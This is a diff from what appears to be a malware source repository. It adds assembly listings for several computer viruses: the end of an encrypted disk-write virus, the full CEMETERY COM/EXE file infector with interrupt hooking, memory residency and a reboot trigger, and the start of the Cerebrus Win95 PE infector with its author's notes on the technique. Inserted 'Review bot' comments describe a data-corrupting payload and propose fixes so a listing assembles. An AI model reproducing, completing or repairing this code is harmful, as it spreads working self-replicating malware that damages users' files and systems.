es:[bx+4],80h ; error ? 
yes, zf = 0 + ret ; return + +Convert: cmp ax,0ff0h ; convert cluster number into + jae Fat16 ; an sector number and offset + mov si,3 ; into this sector containing + xor word ptr cs:[si+gad-1],si ; the fat-item of this + mul si ; cluster + shr ax,1 + mov di,0fffh + jnc Continue + mov di,0fff0h + jmp short Continue +Fat16: mov si,2 + mul si + mov di,0ffffh +Continue: mov si,512 + div si + inc ax + ret + +EncryptWrite1: push ds ; write virus to disk + push cs ; (encrypted) save regs + pop ds + push es + push cs + pop es + cld ; copy forward + mov cx,12 ; length of encryptor + mov si,offset Encrypt ; start of encryptor + mov di,offset EncryptWrite2 ; destenation + inc byte ptr ds:[si+8] ; change xor value + rep movsb ; copy encryptor + mov cl,10 ; copy dorequest proc + mov si,offset DoRequest + rep movsb + mov cl,12 ; copy encryptor + mov si,offset Encrypt + rep movsb + mov ax,0c31fh ; store "pop ds","ret" + stosw ; instructions + pop es ; restore register + jmp EncryptWrite2 ; encrypt and write vir + +;*****************************************************************************; +; ; +; Data ; +; ; +;*****************************************************************************; + +File db "C:",255,0 ; the virus tries to open this + ; file + +Counter dw 0 ; this will count the number of + ; systems that are infected by + ; this virus + +Param dw 0,80h,?,5ch,?,6ch,? ; parameters for the + ; exec-function + +Random db ? ; if this byte becomes zero + ; the virus will change the + ; sector that will be written + ; to disk + +Header db 7 dup(?) ; this is the header for the + ; device driver + +Filename db ? 
; Buffer for the filename used
+ ; by the exec-function
+
+
+;*****************************************************************************;
+; ;
+; The End ;
+; ;
+;*****************************************************************************;
+
+code ends ; end of the viral code
+
+end Encrypt ; start at offset 100h for
+ ; com-file
+
+; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
+; 哪哪哪哪哪哪哪哪哪哪> and Remember Don't Forget to Call <哪哪哪哪哪哪哪哪
+; 哪哪哪哪哪哪> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <哪哪哪哪哪
+; 哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
diff --git a/MSDOS/Virus.MSDOS.Unknown.cemetary.asm b/MSDOS/Virus.MSDOS.Unknown.cemetary.asm
new file mode 100644
index 00000000..93242a08
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.cemetary.asm
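Review bot: The file header describes this variant only as "Encrypting, try to find it", but the Output handler carries a destructive payload the header never mentions: each time `inc byte ptr cs:Random` wraps to zero, `inc byte ptr ds:[bx]` alters a byte at an address taken from the request block (`lds bx,ds:[bx+16h]` followed by `inc bh`) before the request is passed on, and the author's own comment on that line, `destroy some data`, marks it as deliberate. The only other hint is the comment on `Random db ?` at the bottom of the file, which is the last place a reader looks. The header block should state that this variant periodically corrupts data on write, since that is the property an analyst of an infected volume most needs to know; something like `; Payload: roughly every 256th write request has one byte altered (see Output / Random)` would do.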
@@ -0,0 +1,737 @@ + +PAGE 60,132 + +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 +;圹 圹 +;圹 CEMETERY 圹 +;圹 圹 +;圹 Created: 4-Mar-91 圹 +;圹 圹 +;圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹圹 + +data_1e equ 4Ch ; (0000:004C=31h) +data_2e equ 4Eh ; (0000:004E=70h) +data_3e equ 70h ; (0000:0070=0FF33h) +data_4e equ 72h ; (0000:0072=0F000h) +data_5e equ 84h ; (0000:0084=0E3h) +data_6e equ 86h ; (0000:0086=161Ah) +data_7e equ 90h ; (0000:0090=8Eh) +data_8e equ 92h ; (0000:0092=1498h) +data_9e equ 102h ; (0000:0102=0CC00h) +data_10e equ 106h ; (0000:0106=326h) +data_11e equ 450h ; (0000:0450=184Fh) +data_12e equ 46Ch ; (0000:046C=0C4BCh) +data_13e equ 46Eh ; (0000:046E=10h) +data_14e equ 47Bh ; (0000:047B=0) +data_15e equ 0 ; (0326:0000=6A7h) +data_16e equ 2 ; (0326:0002=70h) +data_17e equ 0 ; (0687:0000=81h) +data_18e equ 1 ; (0688:0001=0FF17h) +data_19e equ 2 ; (06E3:0002=2342h) +data_20e equ 6 ; (06E3:0006=2344h) +data_46e equ 0FBF0h ; (701E:FBF0=0) +data_47e equ 0FBF2h ; (701E:FBF2=0) +data_48e equ 0FC10h ; (701E:FC10=0) +data_49e equ 0FC12h ; (701E:FC12=0) +data_50e equ 0FC14h ; (701E:FC14=0) +data_51e equ 0FC1Eh ; (701E:FC1E=0) +data_52e equ 0FC20h ; (701E:FC20=0) +data_53e equ 0FC26h ; (701E:FC26=0) +data_54e equ 0FC28h ; (701E:FC28=0) + +code_seg_a segment + assume cs:code_seg_a, ds:code_seg_a + + + org 100h + +cemetery proc far + +start: +data_21 dw 0CE9h +data_22 dw 0C304h + db 23 dup (0C3h) + db 'CEMETERY' +data_24 dw 0C3C3h +data_25 dw 0C3C3h +data_26 dw 0 +data_27 dw 0 +data_28 dw 0 +data_29 dw 0 +data_30 dw 0 +data_31 dd 00000h +data_32 dw 0 +data_33 dw 0 +data_34 dd 00000h +data_35 dw 0 +data_36 dw 0 + db 68h, 0E8h, 55h, 3, 90h, 3Dh + db 4Dh, 4Bh, 75h, 9, 55h, 8Bh + db 0ECh, 83h, 66h, 6, 0FEh, 5Dh + db 0CFh, 80h, 0FCh, 4Bh, 74h, 12h + db 3Dh, 0, 3Dh, 74h, 0Dh, 3Dh + db 0, 6Ch, 75h, 5, 80h, 0FBh + db 0, 74h, 3 +loc_1: + jmp loc_13 +loc_2: + push es + push ds + push di + push si + push bp + push dx + push cx + push bx + push ax + call sub_6 + call sub_7 + cmp ax,6C00h + jne 
loc_3 ; Jump if not equal + mov dx,si +loc_3: + mov cx,80h + mov si,dx + +locloop_4: + inc si + mov al,[si] + or al,al ; Zero ? + loopnz locloop_4 ; Loop if zf=0, cx>0 + + sub si,2 + cmp word ptr [si],4D4Fh + je loc_7 ; Jump if equal + cmp word ptr [si],4558h + je loc_6 ; Jump if equal +loc_5: + jmp short loc_12 + db 90h +loc_6: + cmp word ptr [si-2],452Eh + nop + jz loc_8 ; Jump if zero + jmp short loc_5 +loc_7: + cmp word ptr [si-2],432Eh + jne loc_5 ; Jump if not equal + cmp word ptr [si-4],444Eh + jne loc_5 ; Jump if not equal +loc_8: + mov ax,3D02h + call sub_5 + jc loc_12 ; Jump if carry Set + mov bx,ax + mov ax,5700h + call sub_5 + mov cs:data_27,cx ; (701E:0129=0) + mov cs:data_28,dx ; (701E:012B=0) + mov ax,4200h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_5 + push cs + pop ds + mov dx,103h + mov si,dx + mov cx,18h + mov ah,3Fh ; '?' + call sub_5 + jc loc_10 ; Jump if carry Set + cmp word ptr [si],5A4Dh + jne loc_9 ; Jump if not equal + call sub_1 + jmp short loc_10 +loc_9: + call sub_4 +loc_10: + jc loc_11 ; Jump if carry Set + mov ax,5701h + mov cx,cs:data_27 ; (701E:0129=0) + mov dx,cs:data_28 ; (701E:012B=0) + call sub_5 +loc_11: + mov ah,3Eh ; '>' + call sub_5 +loc_12: + call sub_7 + pop ax + pop bx + pop cx + pop dx + pop bp + pop si + pop di + pop ds + pop es +loc_13: + jmp cs:data_31 ; (701E:0131=0) + +cemetery endp + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_1 proc near + mov cx,[si+16h] + add cx,[si+8] + mov ax,10h + mul cx ; dx:ax = reg * ax + add ax,[si+14h] + adc dx,0 + push dx + push ax + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_5 + cmp dx,0 + jne loc_14 ; Jump if not equal + cmp ax,589h + jae loc_14 ; Jump if above or = + pop ax + pop dx + stc ; Set carry flag + ret +loc_14: + mov di,ax + mov bp,dx + pop cx + sub ax,cx + pop cx + sbb dx,cx + cmp word ptr [si+0Ch],0 + je loc_ret_17 ; Jump if equal + cmp dx,0 + jne loc_15 ; 
Jump if not equal + cmp ax,589h + jne loc_15 ; Jump if not equal + stc ; Set carry flag + ret +loc_15: + mov dx,bp + mov ax,di + push dx + push ax + add ax,589h + adc dx,0 + mov cx,200h + div cx ; ax,dx rem=dx:ax/reg + les di,dword ptr [si+2] ; Load 32 bit ptr + mov cs:data_29,di ; (701E:012D=0) + mov cs:data_30,es ; (701E:012F=0) + mov [si+2],dx + cmp dx,0 + je loc_16 ; Jump if equal + inc ax +loc_16: + mov [si+4],ax + pop ax + pop dx + call sub_2 + sub ax,[si+8] + les di,dword ptr [si+14h] ; Load 32 bit ptr + mov data_24,di ; (701E:0123=0C3C3h) + mov data_25,es ; (701E:0125=0C3C3h) + mov [si+14h],dx + mov [si+16h],ax + mov word ptr data_26,ax ; (701E:0127=0) + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_5 + call sub_3 + jc loc_ret_17 ; Jump if carry Set + mov ax,4200h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_5 + mov ah,40h ; '@' + mov dx,si + mov cx,18h + call sub_5 + +loc_ret_17: + ret +sub_1 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_2 proc near + mov cx,4 + mov di,ax + and di,0Fh + +locloop_18: + shr dx,1 ; Shift w/zeros fill + rcr ax,1 ; Rotate thru carry + loop locloop_18 ; Loop if cx > 0 + + mov dx,di + ret +sub_2 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_3 proc near + mov ah,40h ; '@' + mov cx,589h + mov dx,100h + call sub_6 + jmp short loc_22 + db 90h + +;哌哌 External Entry into Subroutine 哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 + +sub_4: + mov ax,4202h + xor cx,cx ; Zero register + xor dx,dx ; Zero register + call sub_5 + cmp ax,589h + jb loc_ret_21 ; Jump if below + cmp ax,0FA00h + jae loc_ret_21 ; Jump if above or = + push ax + cmp byte ptr [si],0E9h + jne loc_19 ; Jump if not equal + sub ax,58Ch + cmp ax,[si+1] + jne loc_19 ; Jump if not equal + pop ax + stc ; Set carry flag + ret +loc_19: + call sub_3 + jnc loc_20 ; Jump if carry=0 + pop ax + ret +loc_20: + mov ax,4200h + xor 
cx,cx ; Zero register
+ xor dx,dx ; Zero register
+ call sub_5
+ pop ax
+ sub ax,3
+ mov dx,123h
+ mov si,dx
+ mov byte ptr cs:[si],0E9h
+ mov cs:[si+1],ax
+ mov ah,40h ; '@'
+ mov cx,3
+ call sub_5
+
+loc_ret_21:
+ ret
+sub_3 endp
+
+
+;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
+; SUBROUTINE
+;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
+
+sub_5 proc near
+loc_22:
+ pushf ; Push flags
+ call cs:data_31 ; (701E:0131=0)
+ ret
+sub_5 endp
+
+
+;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
+; SUBROUTINE
+;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
+
+sub_6 proc near
+ push ax
+ push ds
+ push es
+ xor ax,ax ; Zero register
+ push ax
+ pop ds
+ cli ; Disable interrupts
+ les ax,dword ptr ds:data_7e ; (0000:0090=18Eh) Load 32 bit ptr
+ mov cs:data_32,ax ; (701E:0135=0)
+ mov cs:data_33,es ; (701E:0137=0)
+ mov ax,3ABh
+ mov ds:data_7e,ax ; (0000:0090=18Eh)
+ mov ds:data_8e,cs ; (0000:0092=1498h)
+ les ax,dword ptr ds:data_1e ; (0000:004C=831h) Load 32 bit ptr
+ mov cs:data_35,ax ; (701E:013D=0)
+ mov cs:data_36,es ; (701E:013F=0)
+ les ax,cs:data_34 ; (701E:0139=0) Load 32 bit ptr
+ mov ds:data_1e,ax ; (0000:004C=831h)
+ mov ds:data_2e,es ; (0000:004E=70h)
+ sti ; Enable interrupts
+ pop es
+ pop ds
+ pop ax
+ ret
+sub_6 endp
+
+
+;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌
+; SUBROUTINE
+;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘
+
+sub_7 proc near
+ push ax
+ push ds
+ push es
+ xor ax,ax ; Zero register
+ push ax
+ pop ds
+ cli ; Disable interrupts
+ les ax,dword ptr cs:data_32 ; (701E:0135=0) Load 32 bit ptr
+ mov ds:data_7e,ax ; (0000:0090=18Eh)
+ mov ds:data_8e,es ; (0000:0092=1498h)
+ les ax,dword ptr cs:data_35 ; (701E:013D=0) Load 32 bit ptr
+ mov ds:data_1e,ax ; (0000:004C=831h)
+ mov ds:data_2e,es ; (0000:004E=70h)
+ sti ; Enable interrupts
+ pop es
+ pop ds
+ pop ax
+ ret
+sub_7 endp
+
+ db 0B0h, 3, 0CFh, 50h, 53h, 51h
+ db 2Eh, 0A3h, 0FEh, 3, 2Eh, 0A1h
+ db 0F7h, 3, 0A3h, 50h, 4, 2Eh
+ db 0A1h, 0F5h, 3, 8Ah, 0DCh, 0B4h
+ db 9, 0B9h, 1, 0, 0CDh, 10h
+ db 0E8h, 34h, 0, 0E8h, 0B7h, 0
+ db 
2Eh, 0A1h, 0F7h, 3, 0A3h, 50h + db 4, 0B3h, 7, 0B8h, 7, 9 + db 0B9h, 1, 0, 0CDh, 10h, 2Eh + db 0A1h, 0FEh, 3, 0A3h, 50h, 4 + db 7, 1Fh + db ']_^ZY[X.' + db 0FFh, 2Eh, 0FAh, 3 +data_37 dw 0 +data_38 db 10h +data_39 db 10h +data_40 db 0 +data_41 dw 0 +data_42 dw 0 + db 0, 0, 2Eh, 0A1h, 0F7h, 3 + db 8Bh, 1Eh, 4Ah, 4, 4Bh, 2Eh + db 0F6h, 6, 0F9h, 3, 1, 74h + db 0Ch, 3Ah, 0C3h, 72h, 12h, 2Eh + db 80h, 36h, 0F9h, 3, 1, 0EBh + db 0Ah +loc_23: + cmp al,0 + jg loc_24 ; Jump if > + xor byte ptr cs:data_40,1 ; (701E:03F9=0) +loc_24: + test byte ptr cs:data_40,2 ; (701E:03F9=0) + jz loc_25 ; Jump if zero + cmp ah,18h + jb loc_26 ; Jump if below + xor byte ptr cs:data_40,2 ; (701E:03F9=0) + jmp short loc_26 +loc_25: + cmp ah,0 + jg loc_26 ; Jump if > + xor byte ptr cs:data_40,2 ; (701E:03F9=0) +loc_26: + cmp byte ptr cs:data_37,20h ; (701E:03F5=0) ' ' + je loc_27 ; Jump if equal + db 2Eh +data_44 dw 3E80h + db 0F8h, 3, 0, 74h, 6, 2Eh + db 80h, 36h, 0F9h, 3, 2 +loc_27: + test byte ptr cs:data_40,1 ; (701E:03F9=0) + jz loc_28 ; Jump if zero + inc cs:data_38 ; (701E:03F7=10h) + jmp short loc_29 +loc_28: + dec cs:data_38 ; (701E:03F7=10h) +loc_29: + test byte ptr cs:data_40,2 ; (701E:03F9=0) + jz loc_30 ; Jump if zero + inc cs:data_39 ; (701E:03F8=10h) + jmp short loc_ret_31 +loc_30: + dec cs:data_39 ; (701E:03F8=10h) + +loc_ret_31: + ret + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_8 proc near + mov ax,word ptr cs:data_38 ; (701E:03F7=1010h) + mov ds:data_11e,ax ; (0000:0450=184Fh) + mov bh,data_55 ; (0000:0462=0D400h) + mov ah,8 + int 10h ; Video display ah=functn 08h + ; get char al & attrib ah @curs + mov cs:data_37,ax ; (701E:03F5=0) + ret +sub_8 endp + + db 50h, 53h, 51h, 52h, 56h, 57h + db 55h, 1Eh, 6, 33h, 0C0h, 50h + db 1Fh, 81h, 3Eh, 70h, 0, 0AEh + db 3, 74h, 35h, 0A1h, 6Ch, 4 + db 8Bh, 16h, 6Eh, 4, 0B9h, 0FFh + db 0FFh, 0F7h, 0F1h, 3Dh, 10h, 0 + db 75h, 24h, 0FAh, 8Bh, 2Eh, 50h + db 4, 0E8h, 0BEh, 0FFh, 89h, 2Eh + 
db 50h, 4, 0C4h, 6, 70h, 0 + db 2Eh, 0A3h, 0FAh, 3, 2Eh, 8Ch + db 6, 0FCh, 3, 0C7h, 6, 70h + db 0, 0AEh, 3, 8Ch, 0Eh, 72h + db 0, 0FBh +loc_32: + mov ah,2 + int 14h ; RS-232 dx=com1, ah=func 02h + ; get char al, ah=return status + cmp al,31h ; '1' + je loc_33 ; Jump if equal + jnz loc_34 ; Jump if not zero +loc_33: + int 19h ; Bootstrap loader +loc_34: + pop es + pop ds + pop bp + pop di + pop si + pop dx + pop cx + pop bx + pop ax + ret + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_9 proc near + mov dx,10h + mul dx ; dx:ax = reg * ax + ret +sub_9 endp + + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_10 proc near + xor ax,ax ; Zero register + xor bx,bx ; Zero register + xor cx,cx ; Zero register + xor dx,dx ; Zero register + xor si,si ; Zero register + xor di,di ; Zero register + xor bp,bp ; Zero register + ret +sub_10 endp + + db 1Eh, 0E8h, 0, 0 + +;哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌哌 +; SUBROUTINE +;苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘苘 + +sub_11 proc near + mov ax,4B4Dh + int 21h ; DOS Services ah=function 4Bh + ; run progm @ds:dx, parm @es:bx + jc loc_35 ; Jump if carry Set + jmp loc_45 +loc_35: + pop si + push si + mov di,si + xor ax,ax ; Zero register + push ax + pop ds + les ax,dword ptr ds:data_1e ; (0000:004C=831h) Load 32 bit ptr + mov cs:data_53e[si],ax ; (701E:FC26=0) + mov cs:data_54e[si],es ; (701E:FC28=0) + les bx,dword ptr ds:data_5e ; (0000:0084=6E3h) Load 32 bit ptr + mov cs:data_51e[di],bx ; (701E:FC1E=0) + mov cs:data_52e[di],es ; (701E:FC20=0) + mov ax,ds:data_9e ; (0000:0102=0CC00h) + cmp ax,0F000h + jne loc_43 ; Jump if not equal + mov dl,80h + mov ax,ds:data_10e ; (0000:0106=326h) + cmp ax,0F000h + je loc_36 ; Jump if equal + cmp ah,0C8h + jb loc_43 ; Jump if below + cmp ah,0F4h + jae loc_43 ; Jump if above or = + test al,7Fh + jnz loc_43 ; Jump if not zero + mov ds,ax + cmp word ptr ds:data_15e,0AA55h ; (0326:0000=6A7h) + jne 
loc_43 ; Jump if not equal + mov dl,ds:data_16e ; (0326:0002=70h) +loc_36: + mov ds,ax + xor dh,dh ; Zero register + mov cl,9 + shl dx,cl ; Shift w/zeros fill + mov cx,dx + xor si,si ; Zero register + +locloop_37: + lodsw ; String [si] to ax + cmp ax,0FA80h + jne loc_38 ; Jump if not equal + lodsw ; String [si] to ax + cmp ax,7380h + je loc_39 ; Jump if equal + jnz loc_40 ; Jump if not zero +loc_38: + cmp ax,0C2F6h + jne loc_41 ; Jump if not equal + lodsw ; String [si] to ax + cmp ax,7580h + jne loc_40 ; Jump if not equal +loc_39: + inc si + lodsw ; String [si] to ax + cmp ax,40CDh + je loc_42 ; Jump if equal + sub si,3 +loc_40: + dec si + dec si +loc_41: + dec si + loop locloop_37 ; Loop if cx > 0 + + jmp short loc_43 +loc_42: + sub si,7 + mov cs:data_53e[di],si ; (701E:FC26=0) + mov cs:data_54e[di],ds ; (701E:FC28=0) +loc_43: + mov ah,62h ; 'b' + int 21h ; DOS Services ah=function 62h + ; get progrm seg prefix addr bx + mov es,bx + mov ah,49h ; 'I' + int 21h ; DOS Services ah=function 49h + ; release memory block, es=seg + mov bx,0FFFFh + mov ah,48h ; 'H' + int 21h ; DOS Services ah=function 48h + ; allocate memory, bx=bytes/16 + sub bx,5Ah + nop + jc loc_45 ; Jump if carry Set + mov cx,es + stc ; Set carry flag + adc cx,bx + mov ah,4Ah ; 'J' + int 21h ; DOS Services ah=function 4Ah + ; change mem allocation, bx=siz + mov bx,59h + stc ; Set carry flag + sbb es:data_19e,bx ; (06E3:0002=2342h) + push es + mov es,cx + mov ah,4Ah ; 'J' + int 21h ; DOS Services ah=function 4Ah + ; change mem allocation, bx=siz + mov ax,es + dec ax + mov ds,ax + mov word ptr ds:data_18e,8 ; (0688:0001=0FF17h) + call sub_9 + mov bx,ax + mov cx,dx + pop ds + mov ax,ds + call sub_9 + add ax,ds:data_20e ; (06E3:0006=2344h) + adc dx,0 + sub ax,bx + sbb dx,cx + jc loc_44 ; Jump if carry Set + sub ds:data_20e,ax ; (06E3:0006=2344h) +loc_44: + mov si,di + xor di,di ; Zero register + push cs + pop ds + sub si,413h + mov cx,589h + inc cx + rep movsb ; Rep while cx>0 Mov [si] to es:[di] + mov 
ah,62h ; 'b' + int 21h ; DOS Services ah=function 62h + ; get progrm seg prefix addr bx + dec bx + mov ds,bx + mov byte ptr ds:data_17e,5Ah ; (0687:0000=81h) 'Z' + mov dx,142h + xor ax,ax ; Zero register + push ax + pop ds + mov ax,es + sub ax,10h + mov es,ax + cli ; Disable interrupts + mov ds:data_5e,dx ; (0000:0084=6E3h) + mov ds:data_6e,es ; (0000:0086=161Ah) + sti ; Enable interrupts + dec byte ptr ds:data_14e ; (0000:047B=0) +loc_45: + pop si + cmp word ptr cs:data_46e[si],5A4Dh ; (701E:FBF0=0) + jne loc_46 ; Jump if not equal + pop ds + mov ax,cs:data_50e[si] ; (701E:FC14=0) + mov bx,cs:data_49e[si] ; (701E:FC12=0) + push cs + pop cx + sub cx,ax + add cx,bx + push cx + push word ptr cs:data_48e[si] ; (701E:FC10=0) + push ds + pop es + call sub_10 + ret ; Return far +loc_46: + pop ax + mov ax,cs:data_46e[si] ; (701E:FBF0=0) + mov cs:data_21,ax ; (701E:0100=0CE9h) + mov ax,cs:data_47e[si] ; (701E:FBF2=0) + mov cs:data_22,ax ; (701E:0102=0C304h) + mov ax,100h + push ax + push cs + pop ds + push ds + pop es + call sub_10 + ret +sub_11 endp + + +code_seg_a ends + + + + end start diff --git a/MSDOS/Virus.MSDOS.Unknown.cerebus.asm b/MSDOS/Virus.MSDOS.Unknown.cerebus.asm new file mode 100644 index 00000000..1f86f233 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.cerebus.asm 
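Review bot: `data_55` is referenced in sub_8 (`mov bh,data_55 ; (0000:0462=0D400h)`) but is never defined anywhere in this file — the `data_Ne equ` table at the top covers data_1e–data_20e and data_46e–data_54e, and the in-code data labels stop at data_44 — so the listing does not assemble as committed. The address in the disassembler's comment puts it in the same BIOS data area as data_11e–data_14e, so a definition alongside those, `data_55 equ 462h ; (0000:0462=0D400h)`, read through the `ds:` override that sub_6/sub_7 use for data_1e and data_7e, is the consistent repair (the exact operand form the original assembled with cannot be recovered from the listing). Separately, the handler dispatch at the top of `cemetery` (`db 68h, 0E8h, 55h, 3, 90h, 3Dh, 4Dh, 4Bh, ...`) and the block after `sub_7 endp` are left as raw `db` byte runs a reader has to decode by hand, and sub_4 is a bare label inside `sub_3 proc` rather than its own procedure; a header comment stating that this is an automated-disassembler recovery with undisassembled code regions and a shared-tail entry point would keep an analyst from treating those byte runs as data.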
@@ -0,0 +1,703 @@ +; +; Cerebrus, by Murkry/IkX +; +; +; +; this virus is a beta test of an idea I have heard and read about, +; but had never tried. What it does is append its own code to the end of the +; host file and then alter the NEW HEADER pointer at 3ch to point to itself. +; While this virus does work, because of a few mistakes I made the infected +; file will not have any icons associated with it. There are several ways +; around this. But my next attempt at one of these would actualy be larger +; I would just copy the virus in memory to the end of the host. This way I +; would not need to write the internal info and would let Win95 handle it all. +; I actual code the Import data table into the virus this is for size +; consideration . While I still like the idea for this virus the main reason +; I wanted to try it was to try out some code I read about that would mark a +; file as Erase on CLose (or something like that). It describes a self erasing +; file like maybe a Setup program runs once never again. But the idea seems +; like it would only work in NT not 95 at least in my tests. +; Another thing I found was that while MS pushes us to use the Win32 +; CreateProc.. and not WinExec. CreateP will only run PE files while WinExec +; will run dos/NE/PE files. So someone could write this so that it infect all +; those files but would only spread under Win95, in DOS the orginal Dos program +; would be called, In 3.11 you would see the dos error msg, and in Win95 all +; the programs would infect and run ok. +; In testing this virus works well 'cept for a few little things, like other +; virus that modify the New Header offset it will make the icons vanish since +; the .rscr section is now "lost". A second thing I believe (know) is that +; since I use an internal .idata structure and I only have one of the pntrs to +; the API in it, yet after the first Generation this pntr is overwritten with +; the address of the API call itself. 
Actually I am sorta surprised this did +; not cause an error, I guess in Win95 it thinks its bound already and leaves +; it alone. Hmm some of you know what I mean others, I sure are lost, ;) sorry. +; Anyway you can fix this in two ways, one easier than the other depending on +; who you talk to. 1 keep the other refrence to the api name, 2 have a routine +; that fixes this before you write the virus to another host. +; Anyway, despite the problems with this version of the virus I beleive that +; this method with some changes could be very viable in the Win32 enviroment. +; +; To compile use the mk.bat file. +; +; The other file 1.inc is just some header info I used after I finished this +; virus I realize I really did not need to do all that work, but for those of +; you who are curios about the PE header examine away. + +; Murkry + + +.386 +.model flat, stdcall +True equ 1 +False equ 0 +GENERIC_READ equ 80000000h +GENERIC_WRITE equ 40000000h +FATTR_NORMAL equ 0 +OPEN_EXISTING equ 3 + +;File is setup so that there will be 2 PE headers we use debug or +; some tool to set the MZ 3ch to point to our second PE header +; then when run the PE part could be append to the other PE files +; and infect in that matter the only parts that need to be alter +; in the section header +; Pter to Raw Data + +LoadAT equ 01000h +offs equ offset PEheader ;+ LoadAT + 400000h + +; - offset PEheader + LoadAT + 400000h +;Define the needed external functions and constants here. + +extrn ExitProcess:PROC +extrn MessageBoxA:PROC + +extrn CreateProcessA:PROC +.data ;the data area +dummy dd ? ;tasm needs some data or it won't work! 
+ +.code ;executable code starts here +include 1.inc + +CodeSect db 'CODE',0,0,0,0 +CodeVSize dd 0000e000h ; +CodeVAddr dd LoadAT ; +CodeSzRawData dd 00000800h ; +CodePtrRwData dd 00000600h ;where the code for this section is + dd 00000000h + dd 00000000h + dw 0000h + dw 0000h +CodeChar dd 0A0000060h ;6000 0020 + + +RescSect db '.rsrc',0,0,0 + dd 00002000H ; + dd 0E000h;LoadAT + 0e000h ; + dd 00001600h ; + dd 00000200h ;where the code for this section is + dd 00000000h + dd 00000000h + dw 00h + dw 00h + db 40h,00,00,40h + + + dd 0000h +CDseg: +IDATA: + DD 0 ; usual this has a redunat entry + ;We are skipping it + ; offset API_LOC1 - offset PEheader + LoadAT + + dd 0 ;time date stamp + dd 0 ;where in memory this dll is loaded + + DD offset DLL1 - offset PEheader + LoadAT + + DD offset API_LOC2 - offset PEheader + LoadAT + + DD 0 ; usual this has a redunt entry + ;We are skipping it + ; offset API_LOC1 - offset PEheader + LoadAT + + dd 0 ;time date stamp + dd 0 ;where in memory this dll is loaded + + DD offset DLLA - offset PEheader + LoadAT + + DD offset API_LOC2A - offset PEheader + LoadAT + DD 00000000H + + + DB 10H DUP(0) + + +API_LOC2 DD offset FUNC1 - offset PEheader + LoadAT ; +beep DD offset FUNC2 - offset PEheader + LoadAT ;4h +VxdCall0 DD 80000001h ;8h +getcomline DD offset FUNC3 - offset PEheader + LoadAT ;Ch +createp DD offset FUNC4 - offset PEheader + LoadAT ;10h +Copy DD offset FUNC5 - offset PEheader + LoadAT +Create DD offset FUNC6 - offset PEheader + LoadAT +FileP DD offset FUNC7 - offset PEheader + LoadAT +Read DD offset FUNC8 - offset PEheader + LoadAT +Write DD offset FUNC9 - offset PEheader + LoadAT +Close DD offset FUNC10 - offset PEheader + LoadAT +FindFirst 